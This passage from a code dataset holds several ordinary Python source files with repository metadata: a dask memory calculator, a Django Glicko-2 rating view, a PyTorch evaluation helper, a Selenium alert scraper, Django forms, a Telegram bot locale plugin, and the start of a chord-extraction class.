"sklearn.ensemble.RandomForestRegressor", "line_number": 19, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.PolynomialFeatures", "line_number": 28, "usage_type": "call"}, {"api_name": "sklearn.model_selection.cross_val_score", "line_number": 41, "usage_type": "call"}]}
+{"seq_id": "70398535847", "text": "import sys, json, argparse\n\nDEBUG = False\n\ndef get_theta(buffers_volumes, buffer_index, _3d_index, O, B):\n T = list()\n Cs = list()\n for dim in range(len(buffers_volumes[buffer_index].p1)):\n if B[dim] < O[dim]:\n C = 0 \n else: \n C = ((_3d_index[dim]+1) * B[dim]) % O[dim]\n # print(f'{((_3d_index[dim]+1) * B[dim])}mod{O[dim]} = {C}')\n if C == 0 and B[dim] != O[dim]: # particular case \n C = O[dim]\n\n if C < 0:\n raise ValueError(\"modulo should not return negative value\")\n\n Cs.append(C)\n T.append(B[dim] - C) \n \n if DEBUG: \n print(f'\\nProcessing buffer {buffer_index}')\n print(f'C: {Cs}')\n print(f'theta: {T}')\n\n return T, Cs\n \n\ndef get_arguments():\n \"\"\" Get arguments from console command.\n \"\"\"\n parser = argparse.ArgumentParser(description=\"\")\n parser.add_argument('config_filepath', \n action='store', \n type=str, \n help='Path to configuration file containing paths of third parties libraries, projects, data directories, etc. See README for more information.')\n return parser.parse_args()\n\n\ndef custom_imports(paths):\n def isempty(s):\n if s == \"\":\n return True \n return False \n\n for k, path in paths.items():\n if \"lib_\" in k and not isempty(path):\n sys.path.insert(0, path)\n\n\nif __name__ == \"__main__\":\n\n args = get_arguments()\n with open(args.config_filepath) as f:\n paths = json.load(f)\n custom_imports(paths)\n\n cases = [\n {\n \"type\": 2,\n \"R\": [3900,3000,3500],\n \"I\": [780,600,700],\n \"O\": [650,500,500],\n \"B\": [390,600,700],\n \"volumestokeep\": [1,2,3]\n }, {\n \"type\": 2,\n \"R\": [3900,3000,3500],\n \"I\": [390,300,350],\n \"O\": [650,500,700],\n \"B\": [390,600,700],\n \"volumestokeep\": [1,2,3]\n }, {\n \"type\": 2,\n \"R\": [3900,3000,3500],\n \"I\": [390,300,350],\n \"O\": [325,250,250],\n \"B\": [195,300,350],\n \"volumestokeep\": [1,2,3]\n },\n {\n \"type\": 3,\n \"R\": [3900,3000,3500],\n \"I\": [780,600,700],\n \"O\": [780,3000,700],\n \"B\": [390,3000,700],\n \"volumestokeep\": [1,2,3]\n },\n {\n \"type\": 3,\n \"R\": [3900,3000,3500],\n \"I\": [780,600,700],\n \"O\": [780,3000,3500],\n \"B\": [390,3000,3500],\n \"volumestokeep\": [1,2,3]\n },\n {\n \"type\": 3,\n \"R\": [3900,3000,3500],\n \"I\": [780,600,700],\n \"O\": [3900,3000,3500],\n \"B\": [390,3000,3500],\n \"volumestokeep\": [1,2,3]\n },\n {\n \"type\": 3,\n \"R\": [3900,3000,3500],\n \"I\": [3900,3000,3500],\n \"O\": [780,600,700],\n \"B\": [390,3000,3500],\n \"volumestokeep\": [1,2,3]\n }\n ]\n\n import dask_io\n from dask_io.optimizer.utils.utils import numeric_to_3d_pos\n from dask_io.optimizer.cases.resplit_utils import get_named_volumes, get_blocks_shape\n\n import logging\n import logging.config\n logging.config.dictConfig({\n 'version': 1,\n 'disable_existing_loggers': True,\n })\n\n for case in cases:\n _type, R, O, I, B, volumestokeep = int(case[\"type\"]), tuple(case[\"R\"]), tuple(case[\"O\"]), tuple(case[\"I\"]), tuple(case[\"B\"]), case[\"volumestokeep\"]\n print(f'Current run ------ \\nType: {_type}\\nR: {R},\\nO: {O},\\nI: {I}\\nvolumestokeep: {volumestokeep}')\n\n buffers_partition = get_blocks_shape(R, B)\n buffers_volumes = get_named_volumes(buffers_partition, B)\n\n # find omega and theta max\n omega_max = [0,0,0]\n T_max = [0,0,0]\n for buffer_index in buffers_volumes.keys():\n _3d_index = numeric_to_3d_pos(buffer_index, buffers_partition, order='F')\n T, Cs = get_theta(buffers_volumes, buffer_index, _3d_index, O, B)\n\n for i in range(3):\n if Cs[i] > omega_max[i]:\n omega_max[i] = Cs[i]\n if 
T[i] > T_max[i]:\n T_max[i] = T[i]\n\n print(\"Omega max: \", omega_max)\n\n nb_bytes_per_voxel = 2\n buffersize = B[0]*B[1]*B[2]\n n = R[2]/B[2]\n N = R[1]/B[1] * R[2]/B[2]\n\n i, j, k = 0, 1, 2\n F1 = omega_max[k] * min(B[j],T_max[j]) * min(B[i],T_max[i])\n F2 = T_max[k] * max(0, min(B[j] - T_max[j] , omega_max[j])) * min(B[i], T_max[i])\n F3 = omega_max[k] * max(0, min(B[j] - T_max[j] , omega_max[j] )) * min(B[i] , T_max[i] )\n F4 = T_max[k] * T_max[j] * max(0, min(B[i] - T_max[i] , omega_max[i] ))\n F5 = omega_max[k] * T_max[j] * max(0, min(B[i] - T_max[i] , omega_max[i] ))\n F6 = T_max[k] * omega_max[1] * max(0, min(B[i] - T_max[i] , omega_max[i] ))\n F7 = omega_max[k] * omega_max[j] * max(0, min(B[i] - T_max[i] , omega_max[i] ))\n\n print('F1:', F1)\n print('F2:', F2)\n print('F3:', F3)\n print('F4:', F4)\n print('F5:', F5)\n print('F6:', F6)\n print('F7:', F7)\n\n print('buffer size: ', buffersize*nb_bytes_per_voxel/1000000000, \"GB\")\n max_mem = (F1 + n*(F2 + F3) + N*(F4 + F5 + F6 + F7) + buffersize) * nb_bytes_per_voxel\n print(\"max_mem: \", max_mem/1000000000, \"GB\")", "repo_name": "GTimothee/dask_io_experiments", "sub_path": "dask_io_experiments/experiment_5/mem_calculator.py", "file_name": "mem_calculator.py", "file_ext": "py", "file_size_in_byte": 5490, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 34, "usage_type": "call"}, {"api_name": "sys.path.insert", "line_number": 50, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 57, "usage_type": "call"}, {"api_name": "logging.config.dictConfig", "line_number": 123, "usage_type": "call"}, {"api_name": "logging.config", "line_number": 123, "usage_type": "attribute"}, {"api_name": "dask_io.optimizer.cases.resplit_utils.get_blocks_shape", "line_number": 132, "usage_type": "call"}, {"api_name": "dask_io.optimizer.cases.resplit_utils.get_named_volumes", "line_number": 133, "usage_type": "call"}, {"api_name": "dask_io.optimizer.utils.utils.numeric_to_3d_pos", "line_number": 139, "usage_type": "call"}]}
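The memory estimate in the record above hinges on `get_theta`: per dimension it takes the position of a buffer's right edge modulo the output-block size `O`, with `C = 0` when the buffer is smaller than the block, and `C` bumped up to `O` whenever the edge lands exactly on a block boundary (the "particular case"). A standalone sketch of that per-dimension rule, using one of the script's own configurations (`O=500`, `B=600` along a dimension):

def theta_dim(idx, O, B):
    # C: how far buffer idx's right edge reaches into the current output block.
    if B < O:
        C = 0
    else:
        C = ((idx + 1) * B) % O
    if C == 0 and B != O:  # edge exactly on a block boundary
        C = O
    return B - C, C  # (theta, C)

for idx in range(4):
    print(idx, theta_dim(idx, O=500, B=600))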
+{"seq_id": "25303634227", "text": "import random\nimport math\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect, Http404\nfrom facemash.models import FaceMash\n\n\ndef play(request):\n \"\"\" The main-page view of facemash app. \"\"\"\n try:\n contestants = FaceMash.objects.all()\n contestant_1 = random.choice(contestants)\n contestant_2 = random.choice(contestants)\n # A while loop to ensure that the contestants aren't same.\n while contestant_1 == contestant_2:\n contestant_2 = random.choice(contestants)\n args = {'contestant_1': contestant_1, 'contestant_2': contestant_2}\n except IndexError:\n error = True\n args = {'error': error}\n return render(request, 'facemash.html', args) \n\ndef ratings_calculator(request, winner_id, loser_id):\n \"\"\"\n This view is the HEART of facemash app. This is where all the calculations\n for the ratings are done. This is where the algorithm is.\n \"\"\"\n try:\n winner = FaceMash.objects.get(id=winner_id)\n loser = FaceMash.objects.get(id=loser_id)\n w = winner\n l = loser\n\n TAU = 0.5 # System constant\n # score = s\n s_w = 1.0\n s_l = 0.0\n # mu\n mu_w = (w.ratings - 1500.0)/173.7178\n mu_l = (l.ratings - 1500.0)/173.7178\n # phi\n phi_w = w.rd/173.7178\n phi_l = l.rd/173.7178\n # g(phi) = g\n g_w = 1.0/math.sqrt(1.0 + 3.0*pow(phi_w, 2)/pow(math.pi, 2))\n g_l = 1.0/math.sqrt(1.0 + 3.0*pow(phi_l, 2)/pow(math.pi, 2))\n # E = E\n E_w = 1.0/(1.0 + math.exp(-g_w*(mu_w - mu_l)))\n E_l = 1.0/(1.0 + math.exp(-g_l*(mu_l - mu_w)))\n # nu\n nu_w = 1.0/(pow(g_l, 2)*E_w*(1 - E_w))\n nu_l = 1.0/(pow(g_w, 2)*E_l*(1 - E_l))\n # delta = delta\n delta_w = nu_w*g_l*(s_w - E_w) # s_w = 1\n delta_l = nu_l*g_w*(s_l - E_l) # s_l = 0\n # a = a\n a_w = math.log(pow(w.sigma, 2), math.e)\n a_l = math.log(pow(l.sigma, 2), math.e)\n\n # f(x) = function_x\n def function_x(x, delta, phi, nu, a):\n \"\"\"\n This function corresponds to f(x) in Glicko-2 Algorithm.\n \"\"\"\n\n e_x = math.exp(x)\n multi = pow(delta, 2) - pow(phi, 2) - nu - math.exp(x)\n divi = 2.0*pow((phi+nu+e_x), 2)\n minus = (x-a)/pow(TAU, 2)\n result = e_x*multi/divi - minus\n return result\n\n EPSILON = 0.000001 # Convergence tolerance\n # Calculate for w (winner).\n A_w = a_w\n if pow(delta_w, 2) > (pow(phi_w, 2) + nu_w):\n B_w = math.log((pow(delta_w, 2) - pow(phi_w, 2) - nu_w), math.e)\n else:\n k = 1\n x = a_w - k*TAU\n f_x = function_x(x, delta_w, phi_w, nu_w, a_w)\n while f_x < 0:\n k += 1\n x = a_w - k*TAU\n function_x(x, delta_w, phi_w, nu_w, a_w)\n B_w = a_w - k*TAU\n\n # find f(A_w)\n f_A_w = function_x(A_w, delta_w, phi_w, nu_w, a_w)\n # find f(B_w)\n f_B_w = function_x(B_w, delta_w, phi_w, nu_w, a_w)\n\n while abs(B_w - A_w) > EPSILON:\n C_w = A_w + (A_w-B_w)*f_A_w/(f_B_w-f_A_w)\n # find f(C_w)\n f_C_w = function_x(C_w, delta_w, phi_w, nu_w, a_w)\n if f_C_w*f_B_w < 0:\n A_w = B_w\n f_A_w = f_B_w\n else:\n f_A_w = f_A_w/2.0\n B_w = C_w\n f_B_w = f_C_w\n # sigmama-dash = sigma_2\n sigma_2_w = math.exp(A_w/2.0)\n # phi-star = p_s\n p_s_w = math.sqrt(pow(phi_w, 2)+pow(sigma_2_w, 2))\n # calculate for l (loser)\n A_l = a_l\n if pow(delta_l, 2) > (pow(phi_l, 2) + nu_l):\n B_l = math.log((pow(delta_l, 2) - pow(phi_l, 2) - nu_l), math.e)\n else:\n k = 1\n x = a_l - k*TAU\n f_x = function_x(x, delta_l, phi_l, nu_l, a_l)\n while f_x < 0:\n k += 1\n x = a_l - k*TAU\n function_x(x, delta_l, phi_l, nu_l, a_l)\n B_l = a_l - k*TAU\n # find f(A_l)\n f_A_l = function_x(A_l, delta_l, phi_l, nu_l, a_l)\n # find f(B_l)\n f_B_l = function_x(B_l, delta_l, phi_l, nu_l, a_l)\n while 
abs(B_l - A_l) > EPSILON:\n C_l = A_l + (A_l-B_l)*f_A_l/(f_B_l-f_A_l)\n # find f(C_l)\n f_C_l = function_x(C_l, delta_l, phi_l, nu_l, a_l)\n if f_C_l*f_B_l < 0:\n A_l = B_l\n f_A_l = f_B_l\n else:\n f_A_l = f_A_l/2.0\n B_l = C_l\n f_B_l = f_C_l\n # sigmama-dash = sigma_2\n sigma_2_l = math.exp(A_l/2.0)\n # phi-star = p_s\n p_s_l = math.sqrt(pow(phi_l, 2)+pow(sigma_2_l, 2))\n # phi-dash = p_2\n p_2_w = 1.0/math.sqrt(1.0/pow(p_s_w, 2) + 1.0/nu_w)\n p_2_l = 1.0/math.sqrt(1.0/pow(p_s_l, 2) + 1.0/nu_l)\n # mu-dash = u_2\n u_2_w = mu_w + pow(p_s_w, 2)*g_l*(s_w - E_w)\n u_2_l = mu_l + pow(p_s_l, 2)*g_w*(s_l - E_l)\n # convert back to orignial ratings\n w.ratings = 173.7178*u_2_w + 1500\n w.sigma = sigma_2_w\n l.ratings = 173.7178*u_2_l + 1500\n l.sigma = sigma_2_l\n\n # As pointed out by the author of Glicko-2, rd (rating deviation)\n # should not go below 30.\n # Therefore, below make a check for that.\n\n w.rd = 173.7178*p_2_w # New rd of winner\n if w.rd < 30:\n w.rd = 30\n l.rd = 173.7178*p_2_l # New rd of loser\n if l.rd < 30:\n l.rd = 30\n # Save the new ratings, rd and volatality for both winner and loser.\n w.save()\n l.save()\n # Redirect back to the Play page\n return HttpResponseRedirect('/facemash/')\n except FaceMash.DoesNotExist:\n raise Http404\n\n\ndef ratings_page(request):\n \"\"\" The ratings-page view. \"\"\"\n\n faces = FaceMash.objects.all().order_by('-ratings')\n return render(request, \"ratings_page.html\", {'faces' : faces})\n\n", "repo_name": "bhch/django-facemash", "sub_path": "facemash/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 6048, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "facemash.models.FaceMash.objects.all", "line_number": 11, "usage_type": "call"}, {"api_name": "facemash.models.FaceMash.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "facemash.models.FaceMash", "line_number": 11, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 12, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 13, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 16, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 21, "usage_type": "call"}, {"api_name": "facemash.models.FaceMash.objects.get", "line_number": 29, "usage_type": "call"}, {"api_name": "facemash.models.FaceMash.objects", "line_number": 29, "usage_type": "attribute"}, {"api_name": "facemash.models.FaceMash", "line_number": 29, "usage_type": "name"}, {"api_name": "facemash.models.FaceMash.objects.get", "line_number": 30, "usage_type": "call"}, {"api_name": "facemash.models.FaceMash.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "facemash.models.FaceMash", "line_number": 30, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 45, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 45, "usage_type": "attribute"}, {"api_name": "math.sqrt", "line_number": 46, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 46, "usage_type": "attribute"}, {"api_name": "math.exp", "line_number": 48, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 49, "usage_type": "call"}, {"api_name": "math.log", "line_number": 57, "usage_type": "call"}, {"api_name": "math.e", "line_number": 57, "usage_type": "attribute"}, {"api_name": "math.log", "line_number": 58, "usage_type": "call"}, {"api_name": "math.e", "line_number": 58, "usage_type": "attribute"}, {"api_name": 
"math.exp", "line_number": 66, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 67, "usage_type": "call"}, {"api_name": "math.log", "line_number": 77, "usage_type": "call"}, {"api_name": "math.e", "line_number": 77, "usage_type": "attribute"}, {"api_name": "math.exp", "line_number": 105, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 107, "usage_type": "call"}, {"api_name": "math.log", "line_number": 111, "usage_type": "call"}, {"api_name": "math.e", "line_number": 111, "usage_type": "attribute"}, {"api_name": "math.exp", "line_number": 137, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 139, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 141, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 142, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 166, "usage_type": "call"}, {"api_name": "facemash.models.FaceMash.DoesNotExist", "line_number": 167, "usage_type": "attribute"}, {"api_name": "facemash.models.FaceMash", "line_number": 167, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 168, "usage_type": "name"}, {"api_name": "facemash.models.FaceMash.objects.all", "line_number": 174, "usage_type": "call"}, {"api_name": "facemash.models.FaceMash.objects", "line_number": 174, "usage_type": "attribute"}, {"api_name": "facemash.models.FaceMash", "line_number": 174, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 175, "usage_type": "call"}]}
+{"seq_id": "29400977666", "text": "import context\nimport torch\nimport numpy as np\nimport torch.nn as nn\nimport torch.utils.data\nfrom torch.utils.data import Dataset, DataLoader\n\nfrom typing import Optional, Tuple\n\n\ndef eval_logits_on_dataset(model: nn.Module, dataset: Dataset, batch_size: int = 128,\n device: Optional[torch.device] = None,\n num_workers: int = 4) -> Tuple[torch.tensor, torch.tensor]:\n \"\"\"\n Takes a model and an evaluation dataset, and returns the logits\n output by the model on that dataset as an array\n :param model: torch.nn.Module that outputs model logits\n :param dataset: pytorch dataset with inputs and labels\n :param batch_size: int\n :param device: device to use for evaluation\n :param num_workers: int, num. workers for the data loader\n :return: stacked torch tensor of logits returned by the model\n on that dataset, and the labels\n \"\"\"\n # Set model in eval mode\n model.eval()\n\n testloader = DataLoader(dataset, batch_size=batch_size,\n shuffle=False, num_workers=num_workers)\n logits_list = []\n labels_list = []\n with torch.no_grad():\n for i, data in enumerate(testloader, 0):\n # Get inputs\n inputs, labels = data\n if device is not None:\n inputs, labels = map(lambda x: x.to(device),\n (inputs, labels))\n logits = model(inputs)\n logits_list.append(logits)\n labels_list.append(labels)\n\n logits = torch.cat(logits_list, dim=0)\n labels = torch.cat(labels_list, dim=0)\n return logits.cpu(), labels.cpu()\n", "repo_name": "KaosEngineer/PriorNetworks", "sub_path": "prior_networks/evaluation.py", "file_name": "evaluation.py", "file_ext": "py", "file_size_in_byte": 1657, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 55, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.nn.Module", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "name"}, {"api_name": "torch.utils.data.Dataset", "line_number": 11, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 12, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 12, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 44, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 13, "usage_type": "attribute"}]}
+{"seq_id": "38919389340", "text": "from time import sleep\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.firefox.options import Options as FirefoxOptions\r\nfrom selenium.webdriver.common.by import By\r\n\r\nfrom helpers.file_manager import FileManager\r\nfrom helpers.file_manager import FILE_PATH\r\n\r\nimport csv\r\nimport random\r\n\r\nclass UtScrapper():\r\n def __init__(self) -> None:\r\n self.ff_options = FirefoxOptions()\r\n self.ff_options.headless = True\r\n self.driver = webdriver.Firefox(options=self.ff_options)\r\n\r\n self.fm = FileManager()\r\n self.fm.check_file()\r\n\r\n async def scrape_ut(self, weburl):\r\n self.driver.get(weburl)\r\n\r\n try:\r\n existent_elements = list(csv.DictReader(open('./data/ut_scrapper.csv', 'r')))\r\n new_element_list = []\r\n\r\n for e in range(10, 0, -1):\r\n element = self.driver.find_element(By.CSS_SELECTOR, 'div.alert-sm:nth-child({})'.format(e))\r\n e_text = str(element.text).split(' ')\r\n e_title = ''\r\n e_date = e_text[0]\r\n e_link = self.driver.find_element(By.CSS_SELECTOR, 'div.alert-sm:nth-child({}) > strong > a'.format(e)).get_attribute('href')\r\n e_flag = False\r\n \r\n for i in range(1,len(e_text)):\r\n if i == 1:\r\n e_title = e_title + e_text[i]\r\n else:\r\n e_title = e_title + ' ' + e_text[i]\r\n \r\n for row in existent_elements:\r\n if row['title'] == e_title and row['date'] == e_date:\r\n e_flag = True\r\n break\r\n\r\n if e_flag == True:\r\n print(\"Element already in file\")\r\n else:\r\n self.fm.write_file(title=e_title, date=e_date, link=e_link)\r\n new_element = {'title': e_title, 'date': e_date, 'link': e_link}\r\n new_element_list.append(new_element)\r\n print(\"---->New element added to the file\")\r\n\r\n print (\"The file has been saved\")\r\n sleep(random.randint(4, 13))\r\n self.driver.close()\r\n return(new_element_list)\r\n\r\n except:\r\n print (\"Element not found\")\r\n sleep(random.randint(4, 13))\r\n self.driver.close()", "repo_name": "Socterean/UT-bot4445", "sub_path": "helpers/ut_scrapper.py", "file_name": "ut_scrapper.py", "file_ext": "py", "file_size_in_byte": 2391, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "selenium.webdriver.firefox.options.Options", "line_number": 14, "usage_type": "call"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 16, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 16, "usage_type": "name"}, {"api_name": "helpers.file_manager.FileManager", "line_number": 18, "usage_type": "call"}, {"api_name": "csv.DictReader", "line_number": 25, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 29, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 29, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 33, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 33, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 56, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 56, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 62, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 62, "usage_type": "call"}]}
+{"seq_id": "36617698954", "text": "import numpy as np\nfrom skimage.measure import block_reduce\n\ndef crop_and_resize(img, target_size=32, zoom=1):\n small_side = int(np.min(img.shape) * zoom)\n reduce_factor = int(small_side / target_size)\n #print(reduce_factor)\n crop_size = target_size * reduce_factor\n mid = np.array(img.shape) // 2\n mid = mid.astype(np.int)\n half_crop = int(crop_size // 2)\n #print(half_crop)\n #half_crop = half_crop.astype(np.int)\n center = img[mid[0]-half_crop:mid[0]+half_crop,\n \tmid[1]-half_crop:mid[1]+half_crop]\n return block_reduce(center, (reduce_factor, reduce_factor), np.mean)\n", "repo_name": "sayands/deep-learning-projects", "sub_path": "SMILE-CNN/utils/crop_and_resize.py", "file_name": "crop_and_resize.py", "file_ext": "py", "file_size_in_byte": 607, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.min", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 10, "usage_type": "attribute"}, {"api_name": "skimage.measure.block_reduce", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 16, "usage_type": "attribute"}]}
+{"seq_id": "12937801107", "text": "import os\n\nfrom babel import Locale\nfrom pyrogram.enums import ChatType\nfrom pyrogram.types import Message\n\nfrom ..bot import Client\nfrom ..database.chats import add_chat, get_chat\n\nLanguages: list[str] = [] # Loaded Locales\n\nfor file in os.listdir(\"twittergram/locales\"):\n if file not in (\"__init__.py\", \"__pycache__\"):\n Languages.append(file.replace(\".yaml\", \"\"))\n\n\n# This is the first plugin run to guarantee\n# that the actual chat is initialized in the DB.\n@Client.on_message(group=-1)\nasync def check_chat(client: Client, message: Message):\n chat = message.chat\n user = message.from_user\n\n try:\n language_code = str(Locale.parse(user.language_code, sep=\"-\"))\n except (AttributeError, TypeError):\n language_code: str = \"en_US\"\n\n if language_code not in Languages:\n language_code: str = \"en-us\"\n\n if user and await get_chat(user.id, ChatType.PRIVATE) is None:\n await add_chat(user.id, language_code, ChatType.PRIVATE)\n\n if await get_chat(chat.id, chat.type) is None:\n await add_chat(chat.id, language_code, chat.type)\n", "repo_name": "ruizlenato/twittergram", "sub_path": "twittergram/plugins/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 1088, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.listdir", "line_number": 12, "usage_type": "call"}, {"api_name": "bot.Client", "line_number": 20, "usage_type": "name"}, {"api_name": "pyrogram.types.Message", "line_number": 20, "usage_type": "name"}, {"api_name": "babel.Locale.parse", "line_number": 25, "usage_type": "call"}, {"api_name": "babel.Locale", "line_number": 25, "usage_type": "name"}, {"api_name": "database.chats.get_chat", "line_number": 32, "usage_type": "call"}, {"api_name": "pyrogram.enums.ChatType.PRIVATE", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pyrogram.enums.ChatType", "line_number": 32, "usage_type": "name"}, {"api_name": "database.chats.add_chat", "line_number": 33, "usage_type": "call"}, {"api_name": "pyrogram.enums.ChatType.PRIVATE", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pyrogram.enums.ChatType", "line_number": 33, "usage_type": "name"}, {"api_name": "database.chats.get_chat", "line_number": 35, "usage_type": "call"}, {"api_name": "database.chats.add_chat", "line_number": 36, "usage_type": "call"}, {"api_name": "bot.Client.on_message", "line_number": 19, "usage_type": "call"}, {"api_name": "bot.Client", "line_number": 19, "usage_type": "name"}]}
+{"seq_id": "12394356549", "text": "from django import forms\nfrom home.models import Book,Author,Genre\n\n\nclass BookForms(forms.Form):\n class Meta:\n book=Book\n fields=('name','genre','purchase_date','author')\n \n title=forms.ModelChoiceField(\n queryset=Book.objects.all(),\n empty_label='Title',widget=forms.Select(attrs={'name':'book','id':'book',\n 'class':'custom-select'})\n )\n\n author=forms.ModelChoiceField(\n queryset=Author.objects.all(),\n empty_label='Author',widget=forms.Select(attrs={'name':'author','id':'author',\n 'class':'custom-select'})\n )\n purchase_date = forms.DateField(label='',widget=forms.DateInput(\n attrs={'placeholder':'Purchase_Date','name':'date','id':'date','class':'form-control'}))\n \n\n genre=forms.ModelMultipleChoiceField(queryset=Genre.objects.all(), widget=forms.CheckboxSelectMultiple)\n\nclass SearchForm(forms.Form):\n q=forms.CharField(label='',\n widget=forms.TextInput(attrs={'placeholder':'search','maxlength':'30',\n 'class':'form-control'}))\n", "repo_name": "dikshaRaj/Diksha", "sub_path": "home/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 1053, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.forms.Form", "line_number": 5, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 5, "usage_type": "name"}, {"api_name": "home.models.Book", "line_number": 7, "usage_type": "name"}, {"api_name": "django.forms.ModelChoiceField", "line_number": 10, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 10, "usage_type": "name"}, {"api_name": "home.models.Book.objects.all", "line_number": 11, "usage_type": "call"}, {"api_name": "home.models.Book.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "home.models.Book", "line_number": 11, "usage_type": "name"}, {"api_name": "django.forms.Select", "line_number": 12, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 12, "usage_type": "name"}, {"api_name": "django.forms.ModelChoiceField", "line_number": 16, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 16, "usage_type": "name"}, {"api_name": "home.models.Author.objects.all", "line_number": 17, "usage_type": "call"}, {"api_name": "home.models.Author.objects", "line_number": 17, "usage_type": "attribute"}, {"api_name": "home.models.Author", "line_number": 17, "usage_type": "name"}, {"api_name": "django.forms.Select", "line_number": 18, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 18, "usage_type": "name"}, {"api_name": "django.forms.DateField", "line_number": 21, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 21, "usage_type": "name"}, {"api_name": "django.forms.DateInput", "line_number": 21, "usage_type": "call"}, {"api_name": "django.forms.ModelMultipleChoiceField", "line_number": 25, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 25, "usage_type": "name"}, {"api_name": "home.models.Genre.objects.all", "line_number": 25, "usage_type": "call"}, {"api_name": "home.models.Genre.objects", "line_number": 25, "usage_type": "attribute"}, {"api_name": "home.models.Genre", "line_number": 25, "usage_type": "name"}, {"api_name": "django.forms.CheckboxSelectMultiple", "line_number": 25, "usage_type": "attribute"}, {"api_name": "django.forms.Form", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 27, "usage_type": "name"}, {"api_name": "django.forms.CharField", 
"line_number": 28, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 28, "usage_type": "name"}, {"api_name": "django.forms.TextInput", "line_number": 29, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 29, "usage_type": "name"}]}
+{"seq_id": "14544952438", "text": "import contextlib\nimport json\nimport os\nimport numpy as np\nfrom numba.core.errors import NumbaDeprecationWarning\nimport warnings\n\nfrom midi import Midi\nfrom constants import VAMP_PATH, CHORD_ENCODINGS_PATH\n\nos.environ[\"VAMP_PATH\"] = VAMP_PATH\nwarnings.filterwarnings(\"ignore\", category=NumbaDeprecationWarning)\n\nfrom chord_extractor.extractors import Chordino # noqa\n\n\nclass Style:\n encoding_type = \"style\"\n\n def __init__(self, midi: Midi):\n self.midi = midi\n\n # File that stores encodings of chords based on vocabulary\n if not os.path.exists(CHORD_ENCODINGS_PATH):\n with open(CHORD_ENCODINGS_PATH, \"w\") as f:\n json.dump([1, {\"N\": 0}], f)\n\n with open(CHORD_ENCODINGS_PATH, \"r\") as f:\n self.num_chords, self.vocab = json.load(f)\n\n # Silence output from Chordino\n with open(os.devnull, \"w\") as devnull:\n with contextlib.redirect_stdout(devnull):\n self.extract_style()\n self.generate_encoding()\n\n def extract_style(self):\n chordino = 